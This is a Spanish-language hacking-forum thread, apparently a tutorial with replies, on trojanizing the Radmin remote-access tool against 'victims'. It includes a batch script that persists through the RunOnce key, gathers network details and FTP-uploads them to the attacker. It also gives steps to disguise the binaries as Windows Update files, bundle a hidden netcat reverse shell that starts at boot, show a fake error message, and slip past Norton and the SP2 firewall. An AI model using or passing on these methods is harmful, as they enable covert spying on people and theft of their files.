En este post se explica como troyanizar radmin, y hacerlo un solo archivo empaquetado, tambien se explica como ponerle un bat que sirva de notificador de ip y hace el loop que dice Manibal_man tambien, tiene trae un enlace para que veas que intruccion le pongas al bat para salatarce el FW del SP2

http://foro.elhacker.net/index.php/topic,56392.0.html

Salu2...

Por cierto ya baje la herramienta que posteas, es realmente sorprendente!!!  muchas gracias por compartirla me a solucionado muchas problemas, esta herramienta deberia de ser tran impresindible como lo es netcat 

Pues eso no va funcionar para lo que quiere yisas_fight ese comando solamente le va dar atributos de archivo oculto pero cuando el bat se ejecute se va seguir viendo la ventana del bat

lo que puedes hacer es usar el comando start y hacer que el bat se ejecute ninimizado, tambien le indicas que le ponga nombre a la aplicacion, pero no le pones nada, le dejas espacios, asi se va ejecutar minimizado y no se va ver el nombre de la ventana en la barra de inicio

tambien pudes hacer que se inicie en el registro pero en run once, todo lo que se ejecute desde esa clave no se va ver, que es justo lo que tu quieres, de esa manera tu bat se va ejecutar y de manera oculta

usa un mata procesos

leete este post aqui se explica como desactivar el fw del sp2, solo tienes que agregarle esa opcion al bat antes de que se ejecute todo lo demas

http://foro.elhacker.net/index.php/topic,63362.0.html

Salu2

mira el ultimo bat es un notificador de ip, por aquello de las ip dinamicas, lo que hace es enviarte a un servidor ftp la nueva ip de la victima, para que te puedas conectar con radmin, puedes crearte una cuenta en lycos, iespana, miarroba...etc y usar el servidor ftp que te den

salu2...

bueno el motivo por el cual le puse wuaudt.exe es porque hay un archivo en la carpeta system32 que se llama wuauclt.exe, ese se encarga de las actualizaciones automaticas del windows, lo hice para hacerlo pasar desapersibido, para un usuario comun lo mas probable es que ni fw tenga pero para alguien que ya sabe un poco mas, ya sabra para que es wuauclt.exe y si su fw de da alarma alomejor y no se fije bien en el nombre y lo deje pasar, por eso hasta le puse el icono del original, veras el metodo de la reverse shell con netcat solo era para que puedas activarlo en el momento y no tengas que esperar a que la victima reinicie, lo que tambien puedes hacer es ponerle un notificador de ip al radmin, de esa forma si la victima tiene ip dinamica estaras al tanto de su nueva ip, te pongo el codigo abajo, este codigo fue sacado del foro, pero lo modifique un poco

@echo off
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v wuauclt /t REG_SZ /d "C:\windows\system32\systrai.bat" /f
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo usuario >C:\WINDOWS\system32\Win32el.dll
echo contraseña >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp
exit

recuerda que el bat se debe llamar systrai.bat y lo debes colocar en la carpeta system32

bueno lo quite unos cuantos comandos, porque si tu quieres le puedes poner mas par conocer mas del sistema, el motivo fue porque este bat se ejecuta todos los dias con el inicio del sistema y por supesto de forma oculta, pero mientras el bat este subiendo los datos al servidor, a la victima no se le va aparecer el escritorio, y eso le va parecer sospechoso fue por eso que le quite comandos, asi sube la info a tu servidor en unos cuanros segundos y sin problemas ni sospechas

salud2..

Bueno lo que pasa es que encontre una web donde tienen intros excelentes en 3d, muchos ya la conoceran, entonces e estao investigando para ver que programa es el que usaran para realizar essos incribles graficos, pero no doy, ya baje el 3d studio max el swift3d y estoy por bajar maya y autocad, esta es la web http://www.finerdesign.com/flash_web_templates.htm si alguien sabe que programa es por favor diganlo ???

No puse el procedimiento porque creo que es muy simple solo hay que seguir la misma logica de la forma en la que se troyanizo, creas un bat que borre todas las entradas en el registro y todos los archivos, el ipakertool, ya tiene una opcion para detener el proceso, de esa manera pones esa instruccion hasta el principio, porque si no, no vas a poder borar el radmin ya que se estaria ejecutando

bat:

recuerda antes de meter las instrucciones del bat en el ipackertool, primero indicale que finalice el proceso del radmin.

saludos....

Pues yo hace tiempo que tenia norton y recuerdo que en las opciones habia una opcion para agragar carpetas o archivos que no quisieras que norton tocara, yo lo hacia para excluir a mis herramientas porque algunas me las borraba, revisa eso y si es asi, le indicas a norton que se brinque el radmin, despues exportas la llave del registro donde se guardan las carpetas y archivos que exluyes y se la importas a la victima

Tutorial troyanizando radmin segunda parte...

en esta ocacion vamos a hacer de radmin un solo ejecutable, que con solo un doble clic se instale con toda nuestra configuracion 

1.- Lo primero que haremos sera bajarnos una herramienta muy util que nos permitira empaquetar todos nuestros archivos. la pueden descargar de esta direccion  http://www.ifrance.com/IsAhT/joiner/IPacker%20Tool.zip

2.- una ves que lo bajemos lo descomprimimos y ejecutamos IPacker Tool.exe ahora nos disponemos a agregar nuestros archivos.

3.- escojemos la opcion agregar, y despues en ejecutable eso nos va enviar a un panel donde podemos poner el archivo que queremos agregar, seleccionamos en el icono de la carpeta y escojemos al servidor de radmin, en mi caso se llama wuaudt.exe ya con otro icono para camuflagearlo.
ahora vamos a indicarle donde se debe extraer el archivo, para eso damos click sobre la flecha que apunta a la izquierda y escojemos %Systemdir%, en mi caso quedo asi: %Systemdir%\wuaudt.exe y le marcamos como archivo del sistema nota: no escojan la opcion de que se ejecute al extraer, recuerden que si se ejecuta no va servir porque aun no tiene su dll copiada ni sus entradas en el registro. bueno ya que esta todo le damos en aceptar

4.- escojemos la opcion agregar y en active x (ocx) extensión de la app. (dll), ahora escojemos la dll de radmin AdmDll.dll y le indicamos que se copien en %Systemdir%, seleccionan la opcion registrar y de archivo del sistema, por ultimo aceptar

5.-escojemos la opcion agregar y en comandos, haí vamos a cargar la configuracion del radmin, recuerdan el bat que hicimos en la primera parte? bien pues lo vamos a volver a usar, para eso damos clic en el icono del bat y abrimos el bat que habiamos hecho, automaticamente se van a cargargar todas las entradas, y le damos en aceptar

6.-denuevo escojemos la opcion agregar luego comando y vamos a agregar la siguiente linea
en mi caso queda asi:
le damos en agregar y por ultimo aceptar

7.-pues esto ya casi queda, pero le vamos a agregar una cosa mas, netcat, si,  debido a que radmin es de conexion directa, vamos a tener problemas con la ip ademas si es red, ya sben el cuete de los routers, entonces pasandole el netcat podemos ejecutar una reverse shell, para eso nos vamos a agregar luego a ejecutable, en archivo le cargamos el netcat, y le indicamos que se copie a %Systemdir%, de preferencia ponganle otro nombre menos llamativo, mas de dos si sabran que es nc.exe, yo le puse al mio aviax.exe, seleccionen la opcion ejecutar tras extraer y ejecutar oculto, luego seleccionamos la opcion iniciar en cada inicio, y selecionen donde queren poner la entrada en el registro, yo la puse en HKLM y de nombre le puse aviax, en parametros le ponemos los de la reverse shell , y seleccionamos la opcion de archivo del sistema, por ultimo aceptar.

8.-ya acabamos ufff, ya solo falta agregarle un ultimo detalle para despistar, nos vamos a agregar, luego a mensajes emergentes y le ponemos un mensaje error yo le puse:
y aceptar

ahora nos dirigimos a opciones, luego cargar icono, y le ponemos el icono de un juegito o un programa

haí mismo tienen la opcion de salvar la configuracion, para tener lo que hicimos de respaldo, y si quieren le marcan la casilla para que se borre automaticamente una ves que sea ejecutado, luego aceptar

9.- por ultimo le damos en generar, y ya tenemos nuestro radmin con su configuracion y ademas netcat que con el inicio del sistema nos dara una reverse shell, ya saben si tienen ip dinamica se ponen un dominio que redireccione a su ip www.no-ip.com

10.-ahora solo abren netcat, lo ponen en escucha -L -p 1717 -vv, le mandan el radmin a la victima, y cuando lo ejecute les dara la shell ya despues abren el cliente de radmin, se conectan a la ip que les de el netcat y a espiar!! y bajarle archivos 

yo hice un removedor con la misma herramienta solo selecionen que finalice el proceso del radmin y netcat, por si se estan ejecutando y despues que borre los archivos y llaves en el registro. y ya tienen radmin troyanizado, junto con su removedor incluido

saludos y suerte con las pruevas

Tutorial escrito por: OCTALH